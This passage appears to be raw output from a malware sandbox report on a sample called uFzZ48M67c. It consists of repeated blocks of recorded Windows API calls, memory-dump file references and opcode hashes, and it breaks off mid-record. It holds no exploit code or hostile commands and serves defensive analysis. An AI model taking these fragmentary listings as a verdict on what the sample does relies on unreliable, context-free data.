                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                          • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                          • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                          • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                          • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                          • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                          • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                          • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                          • __isleadbyte_l.LIBCMT ref: 004208A6
                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                          • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                          • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                          • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                          APIs
                                          • GetParent.USER32(?), ref: 004503C8
                                          • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                          • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                          • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Proc$Parent
                                          • String ID:
                                          • API String ID: 2351499541-0
                                          • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                          • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                          • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                          • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                          • TranslateMessage.USER32(?), ref: 00442B01
                                          • DispatchMessageW.USER32(?), ref: 00442B0B
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Message$Peek$DispatchTranslate
                                          • String ID:
                                          • API String ID: 1795658109-0
                                          • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                          • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                          • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                          • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                          APIs
                                          • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                          • GetCaretPos.USER32(?), ref: 004743B2
                                          • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                          • GetForegroundWindow.USER32 ref: 004743EE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                          • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                          • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                          • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                          APIs
                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                          • _wcslen.LIBCMT ref: 00449519
                                          • _wcslen.LIBCMT ref: 00449526
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend_wcslen$_wcspbrk
                                          • String ID:
                                          • API String ID: 2886238975-0
                                          • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                          • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                          • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                          • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __setmode$DebugOutputString_fprintf
                                          • String ID:
                                          • API String ID: 1792727568-0
                                          • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                          • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                          • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                          • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                          APIs
                                            • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                          • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$Long$AttributesLayered
                                          • String ID:
                                          • API String ID: 2169480361-0
                                          • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                          • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                          • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                          • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                          APIs
                                            • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                            • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                            • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                          • lstrlenW.KERNEL32(?), ref: 00434CF6
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                          • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen$_malloc
                                          • String ID: cdecl
                                          • API String ID: 3850814276-3896280584
                                          • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                          • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                          • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                          • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                          APIs
                                            • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                          • gethostbyname.WSOCK32(?), ref: 0046D42D
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                          • _memmove.LIBCMT ref: 0046D475
                                          • inet_ntoa.WSOCK32(?), ref: 0046D481
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                          • String ID:
                                          • API String ID: 2502553879-0
                                          • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                          • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                          • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                          • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                          APIs
                                          • SendMessageW.USER32 ref: 00448C69
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                          • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow
                                          • String ID:
                                          • API String ID: 312131281-0
                                          • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                          • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                          • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                          • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                          APIs
                                          • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                          • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorLastacceptselect
                                          • String ID:
                                          • API String ID: 385091864-0
                                          • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                          • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                          • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                          • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                          APIs
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                          • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                          • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                          • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                          • GetStockObject.GDI32(00000011), ref: 00430258
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                          • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$CreateMessageObjectSendShowStock
                                          • String ID:
                                          • API String ID: 1358664141-0
                                          • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                          • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                          • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                          • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                          • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                          • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
